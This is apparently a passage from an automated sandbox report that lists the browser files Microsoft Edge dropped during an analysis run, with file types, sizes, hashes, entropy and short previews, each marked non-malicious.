                                                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                      MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                      SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                      SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                      SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:uriCache_

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.994540689956615
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXFFWy:YWLSGTt1o9LuLgfGBPAzkVj/T8lPWy
                                                                                                                                                                                                                                                                                      MD5:0803BEF760679F40A83B27C500448255
                                                                                                                                                                                                                                                                                      SHA1:AC25DFE37AC7A9CA16E63F8516B998D15DED9DAD
                                                                                                                                                                                                                                                                                      SHA-256:5C514E67387A0D29B690B12C396E833DFDC365BC50C260A380E55C0EC1F95EC4
                                                                                                                                                                                                                                                                                      SHA-512:297AB2D92A7B06397E6BB84619300E89E16370CF24BB56F9AAEF8CCD1C49F73D373C13850C969B4CD9DD723620E436D07AC01B8CAA79F3251BB99188A1F069DF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732197275610281}]}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                      MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                      SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                      SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                      SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bb239384-8403-4d24-aa63-0bfa8f96a2c6.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095217927286905
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWsRi1zNtAJTNWJGC0QPvcP8ELKJDSgzMMd6qD47u3S:+/Ps+wsI7ynFxhKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:9F1411D858AC83349C1FBB2096C0A0A5
                                                                                                                                                                                                                                                                                      SHA1:E76397A13EB3F970FA4081FB765A48A54B2B1235
                                                                                                                                                                                                                                                                                      SHA-256:EBA15C4B679BE659E63880A7F9CCC884E88DB8B2EBA7C2B8CF0D786A25575CE1
                                                                                                                                                                                                                                                                                      SHA-512:C1AD56628161862CFD5CA37D170064654CE699DD92339C0A84BAE4F7E0072A16D25876B782218CBA46ED21A9F685485B0263EA9A9DE5A75F76FAFB05A67A67F9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fca88d47-5b66-4594-bd29-889cec0d00e9.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44988
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095423776203783
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWgRi1zNtAJT9zrD2KKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yONxVKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:51A6195C628377D6513D2EDB756BD4D3
                                                                                                                                                                                                                                                                                      SHA1:AD0EE68688184A586C644A0C1A316592947893F5
                                                                                                                                                                                                                                                                                      SHA-256:2724AC8AA1919FF8776EBAF7D82F27F8E6A4086F45A8AB2A93A349949E674835
                                                                                                                                                                                                                                                                                      SHA-512:92E33B256D89D3D6A1DBD1CD1C266CA6F2077C5973F2B0F1E6174CC7295B6813B43647585ACA2FE6323EA3CC34B032742EE478F86FF93527F63A29B88A18C96B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8363127545407694
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxj+xl9Il8up7vJXQZixl3t3IHVAPRNlDwRpid1rc:mG6YP7vJXQZWteVAT2RpB
                                                                                                                                                                                                                                                                                      MD5:7BDDA9C82F5B8B7C42BD85ED6A012009
                                                                                                                                                                                                                                                                                      SHA1:43B1D2C2EDE389AAD60FA0E3B1CC0CD9A6FEB38C
                                                                                                                                                                                                                                                                                      SHA-256:189009C8490CBF6DEF9FA0459C272AD3079E0DA7A8A2EF58DFC08D3882CB6F5E
                                                                                                                                                                                                                                                                                      SHA-512:A4939380F7DDDBC65E0FBD67183D9512017F1B49A7B6F3060A539934CAE04E0D473E4C7E2BD10CBF518766C4959A5A236CE92E3AFD6CFED589702CCB06204450
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
